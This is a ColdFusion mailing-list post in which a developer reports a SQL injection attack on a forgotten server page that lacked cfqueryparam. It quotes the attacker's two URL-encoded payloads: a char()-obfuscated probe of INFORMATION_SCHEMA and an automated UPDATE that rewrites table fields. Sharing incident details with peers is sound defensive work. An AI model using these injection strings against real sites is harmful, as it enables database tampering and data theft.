I can't believe I got hit again. One of my old pages that is no longer linked into the website didn't have a cfqueryparam.. I deleted it from my local machine but forgot to delete it from the server.
I have a generic checker in my cfapplication, but it missed this one.. here is the sequence of events: 1. They tried this on thousands of pages and found 1 where it worked.. (i am leaving off the domain name and page. This is just the query string.) ?item=471+or+1=(%73%65%6C%65%63%74+DATA_TYPE+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(080)%2Bchar(97)%2Bchar(121)%2Bchar(80)%2Bchar(97)%2Bchar(108)+AND+COLUMN_NAME=char(080)%2Bchar(97)%2Bchar(105)%2Bchar(100)%2Bchar(100)%2Bchar(97)%2Bchar(116)%2Bchar(101))- 2. for every table in the database, they did this: It was automated because it happened in a few seconds.. item=471+update+dvds+set+fname1=SUBSTRING(fname1,0,CHARINDEX(char(60)%2Bchar(116)%2Bchar(111)%2Bchar(116)%2Bchar(62),cast(fname1+as+varchar(8000)))-0)-- it came from one ip address: 94.102.52.27 in the netherlands. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:333002 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm